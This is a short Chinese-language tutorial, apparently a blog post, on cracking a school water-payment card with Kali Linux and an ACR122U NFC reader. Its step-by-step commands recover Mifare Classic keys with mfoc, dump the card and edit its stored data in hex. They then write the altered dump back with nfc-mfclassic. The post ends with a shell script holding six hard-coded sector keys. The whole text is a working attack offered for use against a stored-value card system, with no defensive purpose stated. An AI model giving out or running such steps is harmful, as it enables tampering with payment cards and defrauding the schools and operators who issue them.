由於Kali本身就集成了很多nfc工具,用起來很方便,再加上一個acr122u讀卡器,來嘗試PJ學校水卡!
首先安裝驅動,到龍傑官網下載Linux的,解壓后進入自己Linux發行版,Kali的是Debian的,直接是deb安裝包,dpkg -i 安裝就行了
接着安裝debhelper libtool
apt-get install -y debhelper libtool
再打開pcscd的deamon進程
pcscd –fd
然后重啟終端,su模式下就可以使用了,輸入nfc-list就可以顯示卡的信息
把卡放在acr122u上然后敲上
mfoc -O water.dump
就開始自動運算了,跑完后會在當前目錄生成water.dump
然后用vi打開,命令行模式輸入%!xxd,就可以修改十六進制數據,修改完后輸入%!xxd -r就可以保存了
然后要寫入原來的卡,用的是nfc-mfclassic
nfc-mfclassic w|r a|b [dumpfile]
w或r是寫還是讀,a或b是用A密碼還是B密碼,這個是M1卡的結構問題,這里用B密碼
nfc-mfclassic w b water.dump
然后拿去測試一下就行了!
還有的是在windows下的dump破解的文件是1KB的,不是標准的4KB,所以需要用fixdump修復一下才行!
在修改一下,因為mfoc第二次不會加載原來的密碼,所以它會重新破解,很費時間,但它有個 -k的選項,可以自己添加密碼,我們可以寫個shell腳本
簡化第二次的破解
#!/bin/bash
mfoc -k 4efc1e4f8db3 -k b30d6566b8be -k a4980ce76785 -k dc66807440e5\
-k 4eab50e85d50 -k 9fc6c3c63390 -O fanka.dump
每加一個密碼都要加一次 -k ,如果密碼多行尾要記得\
然后把它變為可執行文件chmod +x ./shell
接着執行就可以了 ./shell